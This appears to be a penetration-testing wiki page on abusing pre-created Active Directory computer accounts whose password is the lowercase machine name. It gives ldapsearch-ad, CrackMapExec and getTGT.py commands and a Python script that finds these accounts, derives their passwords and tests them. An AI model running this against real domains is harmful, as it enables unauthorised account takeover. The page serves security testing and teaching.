When a new computer account is configured as a "pre-Windows 2000 computer", its password is set from its name (i.e. the lowercase computer name without the trailing `$`). When it isn't, the password is randomly generated.
According to TrustedSec's blogpost, once a pre-Windows 2000 computer account authenticates for the first time, its password usually has to be changed before the account can be used like any other computer account.
Computer accounts that have been "pre-created" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain) but have never been used can be found by filtering the `userAccountControl` attribute of all computer accounts and looking for the value 4128 (32|4096), deducible from the `userAccountControl` flags:

- 32 - PASSWD_NOTREQD
- 4096 - WORKSTATION_TRUST_ACCOUNT

The `logonCount` attribute can be filtered as well (`logonCount=0`). Note that `logonCount` is not replicated between domain controllers: a value of 0 on one DC only means the account never logged on through that DC, so the query is best run against each DC.
The ldapsearch-ad tool can be used to find such accounts. Once "pre-created" computer accounts that have never authenticated are found, they should be usable with their lowercase name (without the trailing `$`) as password. This can be tested with CrackMapExec (Python) for instance.
```bash
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results (one computer name per line, trailing $ included)
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the pre-Windows 2000 generation, based on the account names (lowercase, trailing $ removed)
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. test each pair line by line (user1:password1, user2:password2, ...) instead of every combination
cme smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce
```
You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)
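The steps above can also be done offline on exported LDAP results. The following Python script is an added example (not code from this page, from TrustedSec or from the tools mentioned above): it decodes `userAccountControl`, selects pre-created computer accounts that never logged on, derives their pre-Windows 2000 password, writes the two files CrackMapExec takes with `--no-bruteforce`, and interprets the resulting NT status. It checks the two flag bits rather than `userAccountControl == 4128`, so accounts carrying extra flags are still caught while disabled ones are skipped. The LDAP entries and the CrackMapExec-style output line are constructed for the example; the account names are hypothetical.

```python
#!/usr/bin/env python3
"""Added example: find pre-created ("pre-Windows 2000") computer accounts that never
logged on, derive their default password and interpret the authentication result.
Sample entries and output lines below are constructed, not real directory data."""

# userAccountControl bits relevant here (documented UAC flag values)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
DONT_EXPIRE_PASSWORD = 0x10000

UAC_FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    PASSWD_NOTREQD: "PASSWD_NOTREQD",
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
}

# Constructed sample of what the LDAP search could return (hypothetical names)
SAMPLE_ENTRIES = [
    {"sAMAccountName": "WS-FINANCE01$", "userAccountControl": "4128", "logonCount": "0"},  # pre-created, never used
    {"sAMAccountName": "WS-HR02$", "userAccountControl": "4128", "logonCount": "12"},      # pre-created, already used
    {"sAMAccountName": "SRV-FILE01$", "userAccountControl": "4096", "logonCount": "0"},    # joined normally: random password
    {"sAMAccountName": "OLD-PC$", "userAccountControl": "4130", "logonCount": "0"},        # 4128 | 2: disabled
    {"sAMAccountName": "svc_backup", "userAccountControl": "66080", "logonCount": "0"},    # user account, not a computer
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAG_NAMES.items()) if value & bit]


def precreated_password(sam_account_name):
    """Password a pre-Windows 2000 computer account is created with: lowercase name, no trailing '$'."""
    return sam_account_name.rstrip("$").lower()


def find_candidates(entries):
    """(sAMAccountName, candidate password) pairs for enabled, pre-created, never-used computer accounts."""
    needed = PASSWD_NOTREQD | WORKSTATION_TRUST_ACCOUNT
    candidates = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        sam = entry["sAMAccountName"]
        if not sam.endswith("$"):  # computer accounts end with '$'
            continue
        if (uac & needed) != needed or (uac & ACCOUNTDISABLE):
            continue
        if int(entry.get("logonCount", "0")) != 0:  # per-DC value, see note above
            continue
        candidates.append((sam, precreated_password(sam)))
    return candidates


def write_cme_lists(candidates, users_path="computers.txt", passwords_path="passwords.txt"):
    """Write the two files used with 'cme ... -u computers.txt -p passwords.txt --no-bruteforce'
    (line N of one file pairs with line N of the other)."""
    with open(users_path, "w") as users, open(passwords_path, "w") as passwords:
        for sam, password in candidates:
            users.write(sam + "\n")
            passwords.write(password + "\n")
    return len(candidates)


def interpret_status(line):
    """Classify one authentication result line by the NT status it carries."""
    if "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT" in line:
        return "password correct, account never used: change the password before using it"
    if "STATUS_LOGON_FAILURE" in line:
        return "wrong password"
    if "[+]" in line:
        return "authenticated"
    return "unknown"


if __name__ == "__main__":
    found = find_candidates(SAMPLE_ENTRIES)
    for sam, password in found:
        print(f"{sam}:{password}  flags={decode_uac(4128)}")
    write_cme_lists(found)
    # Constructed line in the style of CrackMapExec output, not a real capture
    sample = "SMB 10.0.0.10 445 DC01 [-] corp.local\\WS-FINANCE01$:ws-finance01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"
    print(interpret_status(sample))
```

Run it as-is to see which of the constructed entries survive the filter (only `WS-FINANCE01$`), then replace `SAMPLE_ENTRIES` with entries parsed from your own `results.txt`.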
Testers can then change the pre-Windows 2000 computer accounts' password (e.g. with rpcchangepwd.py, kpasswd.py, etc.) in order to use it.
{% hint style="success" %}
Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)

```bash
getTGT.py $DOMAIN/$COMPUTER_NAME\$:$COMPUTER_PASSWORD
```

The ticket obtained can then be used with [pass-the-ticket](ptt.md).
{% endhint %}
{% embed url="https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/" %}
{% embed url="https://web.archive.org/web/20080205233505/http://support.microsoft.com/kb/320187" %}